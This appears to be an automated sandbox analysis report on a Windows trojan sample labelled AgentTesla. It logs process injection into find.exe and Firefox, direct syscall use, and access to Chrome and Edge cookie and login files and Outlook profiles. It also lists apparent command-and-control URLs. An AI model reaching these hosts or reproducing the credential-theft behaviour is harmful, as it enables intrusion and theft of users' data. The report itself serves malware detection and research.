                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_0112A5D0 mov eax, dword ptr fs:[00000030h]2_2_0112A5D0
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_0112E5CF mov eax, dword ptr fs:[00000030h]2_2_0112E5CF
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_0112E5CF mov eax, dword ptr fs:[00000030h]2_2_0112E5CF
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_010F65D0 mov eax, dword ptr fs:[00000030h]2_2_010F65D0
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_010F25E0 mov eax, dword ptr fs:[00000030h]2_2_010F25E0
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_0111E5E7 mov eax, dword ptr fs:[00000030h]2_2_0111E5E7
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_0111E5E7 mov eax, dword ptr fs:[00000030h]2_2_0111E5E7
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_0111E5E7 mov eax, dword ptr fs:[00000030h]2_2_0111E5E7
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_0111E5E7 mov eax, dword ptr fs:[00000030h]2_2_0111E5E7
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_0111E5E7 mov eax, dword ptr fs:[00000030h]2_2_0111E5E7
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_0111E5E7 mov eax, dword ptr fs:[00000030h]2_2_0111E5E7
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_0111E5E7 mov eax, dword ptr fs:[00000030h]2_2_0111E5E7
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_0111E5E7 mov eax, dword ptr fs:[00000030h]2_2_0111E5E7
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_0112C5ED mov eax, dword ptr fs:[00000030h]2_2_0112C5ED
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_0112C5ED mov eax, dword ptr fs:[00000030h]2_2_0112C5ED
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_01128402 mov eax, dword ptr fs:[00000030h]2_2_01128402
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_01128402 mov eax, dword ptr fs:[00000030h]2_2_01128402
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_01128402 mov eax, dword ptr fs:[00000030h]2_2_01128402
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_010EC427 mov eax, dword ptr fs:[00000030h]2_2_010EC427
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_010EE420 mov eax, dword ptr fs:[00000030h]2_2_010EE420
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_010EE420 mov eax, dword ptr fs:[00000030h]2_2_010EE420
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_010EE420 mov eax, dword ptr fs:[00000030h]2_2_010EE420
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_01176420 mov eax, dword ptr fs:[00000030h]2_2_01176420
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_01176420 mov eax, dword ptr fs:[00000030h]2_2_01176420
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_01176420 mov eax, dword ptr fs:[00000030h]2_2_01176420
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_01176420 mov eax, dword ptr fs:[00000030h]2_2_01176420
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_01176420 mov eax, dword ptr fs:[00000030h]2_2_01176420
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_01176420 mov eax, dword ptr fs:[00000030h]2_2_01176420
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_01176420 mov eax, dword ptr fs:[00000030h]2_2_01176420
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_0111245A mov eax, dword ptr fs:[00000030h]2_2_0111245A
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_011AA456 mov eax, dword ptr fs:[00000030h]2_2_011AA456
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_0112E443 mov eax, dword ptr fs:[00000030h]2_2_0112E443
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exe Memory allocated: page read and write | page guard

                      HIPS / PFW / Operating System Protection Evasion

                      Source: C:\Program Files (x86)\AShVEPcAWMFuGJOwdmyYiWSqrEqSlBoNyZjlBYfnvSqaXMqfamJCuO\oPkpFmCiYVL.exe NtWriteVirtualMemory: Direct from: 0x76F0490C
                      Source: C:\Program Files (x86)\AShVEPcAWMFuGJOwdmyYiWSqrEqSlBoNyZjlBYfnvSqaXMqfamJCuO\oPkpFmCiYVL.exe NtOpenKeyEx: Direct from: 0x76F03C9C
                      Source: C:\Program Files (x86)\AShVEPcAWMFuGJOwdmyYiWSqrEqSlBoNyZjlBYfnvSqaXMqfamJCuO\oPkpFmCiYVL.exe NtClose: Direct from: 0x76F02B6C
                      Source: C:\Program Files (x86)\AShVEPcAWMFuGJOwdmyYiWSqrEqSlBoNyZjlBYfnvSqaXMqfamJCuO\oPkpFmCiYVL.exe NtReadVirtualMemory: Direct from: 0x76F02E8C
                      Source: C:\Program Files (x86)\AShVEPcAWMFuGJOwdmyYiWSqrEqSlBoNyZjlBYfnvSqaXMqfamJCuO\oPkpFmCiYVL.exe NtCreateKey: Direct from: 0x76F02C6C
                      Source: C:\Program Files (x86)\AShVEPcAWMFuGJOwdmyYiWSqrEqSlBoNyZjlBYfnvSqaXMqfamJCuO\oPkpFmCiYVL.exe NtSetInformationThread: Direct from: 0x76F02B4C
                      Source: C:\Program Files (x86)\AShVEPcAWMFuGJOwdmyYiWSqrEqSlBoNyZjlBYfnvSqaXMqfamJCuO\oPkpFmCiYVL.exe NtQueryAttributesFile: Direct from: 0x76F02E6C
                      Source: C:\Program Files (x86)\AShVEPcAWMFuGJOwdmyYiWSqrEqSlBoNyZjlBYfnvSqaXMqfamJCuO\oPkpFmCiYVL.exe NtAllocateVirtualMemory: Direct from: 0x76F048EC
                      Source: C:\Program Files (x86)\AShVEPcAWMFuGJOwdmyYiWSqrEqSlBoNyZjlBYfnvSqaXMqfamJCuO\oPkpFmCiYVL.exe NtQuerySystemInformation: Direct from: 0x76F048CC
                      Source: C:\Program Files (x86)\AShVEPcAWMFuGJOwdmyYiWSqrEqSlBoNyZjlBYfnvSqaXMqfamJCuO\oPkpFmCiYVL.exe NtQueryVolumeInformationFile: Direct from: 0x76F02F2C
                      Source: C:\Program Files (x86)\AShVEPcAWMFuGJOwdmyYiWSqrEqSlBoNyZjlBYfnvSqaXMqfamJCuO\oPkpFmCiYVL.exe NtOpenSection: Direct from: 0x76F02E0C
                      Source: C:\Program Files (x86)\AShVEPcAWMFuGJOwdmyYiWSqrEqSlBoNyZjlBYfnvSqaXMqfamJCuO\oPkpFmCiYVL.exe NtSetInformationThread: Direct from: 0x76EF63F9
                      Source: C:\Program Files (x86)\AShVEPcAWMFuGJOwdmyYiWSqrEqSlBoNyZjlBYfnvSqaXMqfamJCuO\oPkpFmCiYVL.exe NtDeviceIoControlFile: Direct from: 0x76F02AEC
                      Source: C:\Program Files (x86)\AShVEPcAWMFuGJOwdmyYiWSqrEqSlBoNyZjlBYfnvSqaXMqfamJCuO\oPkpFmCiYVL.exe NtQueryValueKey: Direct from: 0x76F02BEC
                      Source: C:\Program Files (x86)\AShVEPcAWMFuGJOwdmyYiWSqrEqSlBoNyZjlBYfnvSqaXMqfamJCuO\oPkpFmCiYVL.exe NtCreateFile: Direct from: 0x76F02FEC
                      Source: C:\Program Files (x86)\AShVEPcAWMFuGJOwdmyYiWSqrEqSlBoNyZjlBYfnvSqaXMqfamJCuO\oPkpFmCiYVL.exe NtOpenFile: Direct from: 0x76F02DCC
                      Source: C:\Program Files (x86)\AShVEPcAWMFuGJOwdmyYiWSqrEqSlBoNyZjlBYfnvSqaXMqfamJCuO\oPkpFmCiYVL.exe NtQueryInformationToken: Direct from: 0x76F02CAC
                      Source: C:\Program Files (x86)\AShVEPcAWMFuGJOwdmyYiWSqrEqSlBoNyZjlBYfnvSqaXMqfamJCuO\oPkpFmCiYVL.exe NtTerminateThread: Direct from: 0x76F02FCC
                      Source: C:\Program Files (x86)\AShVEPcAWMFuGJOwdmyYiWSqrEqSlBoNyZjlBYfnvSqaXMqfamJCuO\oPkpFmCiYVL.exe NtProtectVirtualMemory: Direct from: 0x76EF7B2E
                      Source: C:\Program Files (x86)\AShVEPcAWMFuGJOwdmyYiWSqrEqSlBoNyZjlBYfnvSqaXMqfamJCuO\oPkpFmCiYVL.exe NtOpenKeyEx: Direct from: 0x76F02B9C
                      Source: C:\Program Files (x86)\AShVEPcAWMFuGJOwdmyYiWSqrEqSlBoNyZjlBYfnvSqaXMqfamJCuO\oPkpFmCiYVL.exe NtProtectVirtualMemory: Direct from: 0x76F02F9C
                      Source: C:\Program Files (x86)\AShVEPcAWMFuGJOwdmyYiWSqrEqSlBoNyZjlBYfnvSqaXMqfamJCuO\oPkpFmCiYVL.exe NtSetInformationProcess: Direct from: 0x76F02C5C
                      Source: C:\Program Files (x86)\AShVEPcAWMFuGJOwdmyYiWSqrEqSlBoNyZjlBYfnvSqaXMqfamJCuO\oPkpFmCiYVL.exe NtNotifyChangeKey: Direct from: 0x76F03C2C
                      Source: C:\Program Files (x86)\AShVEPcAWMFuGJOwdmyYiWSqrEqSlBoNyZjlBYfnvSqaXMqfamJCuO\oPkpFmCiYVL.exe NtCreateMutant: Direct from: 0x76F035CC
                      Source: C:\Program Files (x86)\AShVEPcAWMFuGJOwdmyYiWSqrEqSlBoNyZjlBYfnvSqaXMqfamJCuO\oPkpFmCiYVL.exe NtWriteVirtualMemory: Direct from: 0x76F02E3C
                      Source: C:\Program Files (x86)\AShVEPcAWMFuGJOwdmyYiWSqrEqSlBoNyZjlBYfnvSqaXMqfamJCuO\oPkpFmCiYVL.exe NtMapViewOfSection: Direct from: 0x76F02D1C
                      Source: C:\Program Files (x86)\AShVEPcAWMFuGJOwdmyYiWSqrEqSlBoNyZjlBYfnvSqaXMqfamJCuO\oPkpFmCiYVL.exe NtResumeThread: Direct from: 0x76F036AC
                      Source: C:\Program Files (x86)\AShVEPcAWMFuGJOwdmyYiWSqrEqSlBoNyZjlBYfnvSqaXMqfamJCuO\oPkpFmCiYVL.exe NtAllocateVirtualMemory: Direct from: 0x76F02BFC
                      Source: C:\Program Files (x86)\AShVEPcAWMFuGJOwdmyYiWSqrEqSlBoNyZjlBYfnvSqaXMqfamJCuO\oPkpFmCiYVL.exe NtReadFile: Direct from: 0x76F02ADC
                      Source: C:\Program Files (x86)\AShVEPcAWMFuGJOwdmyYiWSqrEqSlBoNyZjlBYfnvSqaXMqfamJCuO\oPkpFmCiYVL.exe NtQuerySystemInformation: Direct from: 0x76F02DFC
                      Source: C:\Program Files (x86)\AShVEPcAWMFuGJOwdmyYiWSqrEqSlBoNyZjlBYfnvSqaXMqfamJCuO\oPkpFmCiYVL.exe NtDelayExecution: Direct from: 0x76F02DDC
                      Source: C:\Program Files (x86)\AShVEPcAWMFuGJOwdmyYiWSqrEqSlBoNyZjlBYfnvSqaXMqfamJCuO\oPkpFmCiYVL.exe NtQueryInformationProcess: Direct from: 0x76F02C26
                      Source: C:\Program Files (x86)\AShVEPcAWMFuGJOwdmyYiWSqrEqSlBoNyZjlBYfnvSqaXMqfamJCuO\oPkpFmCiYVL.exe NtResumeThread: Direct from: 0x76F02FBC
                      Source: C:\Program Files (x86)\AShVEPcAWMFuGJOwdmyYiWSqrEqSlBoNyZjlBYfnvSqaXMqfamJCuO\oPkpFmCiYVL.exe NtCreateUserProcess: Direct from: 0x76F0371C
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exe Memory written: C:\Users\user\Desktop\QsBdpe1gK5.exe base: 400000 value starts with: 4D5A
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exe Section loaded: NULL target: C:\Program Files (x86)\AShVEPcAWMFuGJOwdmyYiWSqrEqSlBoNyZjlBYfnvSqaXMqfamJCuO\oPkpFmCiYVL.exe protection: execute and read and write
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exe Section loaded: NULL target: C:\Windows\SysWOW64\find.exe protection: execute and read and write
                      Source: C:\Windows\SysWOW64\find.exe Section loaded: NULL target: C:\Program Files (x86)\AShVEPcAWMFuGJOwdmyYiWSqrEqSlBoNyZjlBYfnvSqaXMqfamJCuO\oPkpFmCiYVL.exe protection: read write
                      Source: C:\Windows\SysWOW64\find.exe Section loaded: NULL target: C:\Program Files (x86)\AShVEPcAWMFuGJOwdmyYiWSqrEqSlBoNyZjlBYfnvSqaXMqfamJCuO\oPkpFmCiYVL.exe protection: execute and read and write
                      Source: C:\Windows\SysWOW64\find.exe Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read write
                      Source: C:\Windows\SysWOW64\find.exe Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and write
                      Source: C:\Windows\SysWOW64\find.exe Thread register set: target process: 7880
                      Source: C:\Windows\SysWOW64\find.exe Thread APC queued: target process: C:\Program Files (x86)\AShVEPcAWMFuGJOwdmyYiWSqrEqSlBoNyZjlBYfnvSqaXMqfamJCuO\oPkpFmCiYVL.exe
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exe Process created: C:\Users\user\Desktop\QsBdpe1gK5.exe "C:\Users\user\Desktop\QsBdpe1gK5.exe"
                      Source: C:\Program Files (x86)\AShVEPcAWMFuGJOwdmyYiWSqrEqSlBoNyZjlBYfnvSqaXMqfamJCuO\oPkpFmCiYVL.exe Process created: C:\Windows\SysWOW64\find.exe "C:\Windows\SysWOW64\find.exe"
                      Source: C:\Windows\SysWOW64\find.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
                      Source: oPkpFmCiYVL.exe, 00000003.00000002.4126710429.0000000001540000.00000002.00000001.00040000.00000000.sdmp, oPkpFmCiYVL.exe, 00000003.00000000.1767984345.0000000001540000.00000002.00000001.00040000.00000000.sdmp, oPkpFmCiYVL.exe, 00000008.00000002.4126997954.00000000015B0000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Shell_TrayWnd
                      Source: oPkpFmCiYVL.exe, 00000003.00000002.4126710429.0000000001540000.00000002.00000001.00040000.00000000.sdmp, oPkpFmCiYVL.exe, 00000003.00000000.1767984345.0000000001540000.00000002.00000001.00040000.00000000.sdmp, oPkpFmCiYVL.exe, 00000008.00000002.4126997954.00000000015B0000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progman
                      Source: oPkpFmCiYVL.exe, 00000003.00000002.4126710429.0000000001540000.00000002.00000001.00040000.00000000.sdmp, oPkpFmCiYVL.exe, 00000003.00000000.1767984345.0000000001540000.00000002.00000001.00040000.00000000.sdmp, oPkpFmCiYVL.exe, 00000008.00000002.4126997954.00000000015B0000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progmanlock
                      Source: oPkpFmCiYVL.exe, 00000003.00000002.4126710429.0000000001540000.00000002.00000001.00040000.00000000.sdmp, oPkpFmCiYVL.exe, 00000003.00000000.1767984345.0000000001540000.00000002.00000001.00040000.00000000.sdmp, oPkpFmCiYVL.exe, 00000008.00000002.4126997954.00000000015B0000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: }Program Manager
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exe Queries volume information: C:\Users\user\Desktop\QsBdpe1gK5.exe VolumeInformation
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeQueries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeQueries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeQueries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeQueries volume information: C:\Windows\Fonts\DUBAI-REGULAR.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeQueries volume information: C:\Windows\Fonts\DUBAI-BOLD.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeQueries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeQueries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeQueries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeQueries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeQueries volume information: C:\Windows\Fonts\FRABK.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeQueries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeQueries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeQueries volume information: C:\Windows\Fonts\GILB____.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeQueries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeQueries volume information: C:\Windows\Fonts\GOUDOSB.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeQueries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeQueries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeQueries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeQueries volume information: C:\Windows\Fonts\LSANSD.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeQueries volume information: C:\Windows\Fonts\LSANSI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeQueries volume information: C:\Windows\Fonts\LSANSDI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeQueries volume information: C:\Windows\Fonts\LTYPE.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeQueries volume information: C:\Windows\Fonts\LTYPEO.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeQueries volume information: C:\Windows\Fonts\LTYPEB.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeQueries volume information: C:\Windows\Fonts\MOD20.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeQueries volume information: C:\Windows\Fonts\MSUIGHUR.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeQueries volume information: C:\Windows\Fonts\PAPYRUS.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeQueries volume information: C:\Windows\Fonts\PARCHM.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeQueries volume information: C:\Windows\Fonts\PER_____.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeQueries volume information: C:\Windows\Fonts\PERI____.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeQueries volume information: C:\Windows\Fonts\PERTILI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeQueries volume information: C:\Windows\Fonts\RAGE.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeQueries volume information: C:\Windows\Fonts\ROCKEB.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeQueries volume information: C:\Windows\Fonts\ROCCB___.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeQueries volume information: C:\Windows\Fonts\VIVALDII.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeQueries volume information: C:\Windows\Fonts\VLADIMIR.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeQueries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeQueries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeQueries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

                      Stealing of Sensitive Information

                      Source: C:\Windows\SysWOW64\find.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
                      Source: C:\Windows\SysWOW64\find.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
                      Source: C:\Windows\SysWOW64\find.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
                      Source: C:\Windows\SysWOW64\find.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                      Source: C:\Windows\SysWOW64\find.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                      Source: C:\Windows\SysWOW64\find.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State
                      Source: C:\Windows\SysWOW64\find.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State
                      Source: C:\Windows\SysWOW64\find.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
                      Source: C:\Windows\SysWOW64\find.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\

                      Remote Access Functionality

                      Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
                      Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | Windows Management Instrumentation | 1 DLL Side-Loading | 412 Process Injection | 1 Masquerading | 1 OS Credential Dumping | 121 Security Software Discovery | Remote Services | 1 Email Collection | 1 Encrypted Channel | Exfiltration Over Other Network Medium | Abuse Accessibility Features
                      Credentials | Domains | Default Accounts | Scheduled Task/Job | Boot or Logon Initialization Scripts | 1 Abuse Elevation Control Mechanism | 1 Disable or Modify Tools | LSASS Memory | 2 Process Discovery | Remote Desktop Protocol | 1 Archive Collected Data | 3 Ingress Tool Transfer | Exfiltration Over Bluetooth | Network Denial of Service
                      Email Addresses | DNS Server | Domain Accounts | At | Logon Script (Windows) | 1 DLL Side-Loading | 41 Virtualization/Sandbox Evasion | Security Account Manager | 41 Virtualization/Sandbox Evasion | SMB/Windows Admin Shares | 1 Data from Local System | 4 Non-Application Layer Protocol | Automated Exfiltration | Data Encrypted for Impact
                      Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | Login Hook | 412 Process Injection | NTDS | 1 Application Window Discovery | Distributed Component Object Model | Input Capture | 4 Application Layer Protocol | Traffic Duplication | Data Destruction
                      Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 1 Deobfuscate/Decode Files or Information | LSA Secrets | 2 File and Directory Discovery | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact
                      Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 1 Abuse Elevation Control Mechanism | Cached Domain Credentials | 113 System Information Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
                      DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 4 Obfuscated Files or Information | DCSync | Remote System Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery
                      Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | 2 Software Packing | Proc Filesystem | System Owner/User Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement
                      Network Topology | Malvertising | Exploit Public-Facing Application | Command and Scripting Interpreter | At | At | 1 Timestomp | /etc/passwd and /etc/shadow | Network Sniffing | Direct Cloud VM Connections | Data Staged | Web Protocols | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Internal Defacement
                      IP Addresses | Compromise Infrastructure | Supply Chain Compromise | PowerShell | Cron | Cron | 1 DLL Side-Loading | Network Sniffing | Network Service Discovery | Shared Webroot | Local Data Staging | File Transfer Protocols | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol | External Defacement
                      [Figure: Behavior Graph. ID: 1589101, Sample: QsBdpe1gK5.exe, Startdate: 11/01/2025, Architecture: WINDOWS, Score: 100]

                      Source | Detection | Scanner | Label
                      QsBdpe1gK5.exe | 80% | Virustotal |
                      QsBdpe1gK5.exe | 88% | ReversingLabs | ByteCode-MSIL.Trojan.AgentTesla
                      QsBdpe1gK5.exe | 100% | Joe Sandbox ML |
                      No Antivirus matches
                                                            http://www.gupiao.bet/t3a1/true
                                                            • Avira URL Cloud: safe
                                                            unknown
                                                            http://www.ssps.shop/r99d/true
                                                            • Avira URL Cloud: safe
                                                            unknown
                                                            http://www.0be.info/5m3m/true
                                                            • Avira URL Cloud: safe
                                                            unknown
                                                            http://www.learnnow.info/6npp/?sTS=jlm9uKJBzKMSKltpVchdAcfiLn2XLMvveDKXZTqGsHNtP0MrAi/8oe7gvYTD+ahEZPaxXoJGvNi0UKW4HyzdiVCn0xvmy+fGUin5LDmJal6tlMrzh8MM5dQ=&fd=Cr_TAhTpvZaLftrue
                                                            • Avira URL Cloud: safe
                                                            unknown
                                                            http://www.qqc5.top/fqrq/true
                                                            • Avira URL Cloud: safe
                                                            unknown
                                                            http://www.qqc5.top/fqrq/?sTS=Y0cHWYGzbrmggkpfvJxXUOlrVtzgTlaz5SpuxjzPWz583Z1p+HcVA7FQEFnwJzFb+2T9MdMSTUdI8uj8DHEKh+4z5Ml02qUNdUfINiCsx6tEm640t8Frn4Y=&fd=Cr_TAhTpvZaLftrue
                                                            • Avira URL Cloud: safe
                                                            unknown
                                                            http://www.learnnow.info/6npp/true
                                                            • Avira URL Cloud: safe
                                                            unknown
                                                            http://www.masterqq.pro/vfw3/true
                                                            • Avira URL Cloud: safe
                                                            unknown
                                                            http://www.hasan.cloud/ve8l/true
                                                            • Avira URL Cloud: safe
                                                            unknown
                                                            http://www.fengzheng.shop/plc2/true
                                                            • Avira URL Cloud: safe
                                                            unknown
                                                            http://www.fengzheng.shop/plc2/?sTS=sjJIcM7rXxnPrFloQUd7uRIIOfMaVKcO2uhZ3WrFd6iw+5UGAWLmyTv1SrcKmKBFl4Y89PiFDrVpBQFB+L6IBSCA24gjnVcGyQtTEi1HcJTxVdLPUB56JMc=&fd=Cr_TAhTpvZaLftrue
                                                            • Avira URL Cloud: safe
                                                            unknown
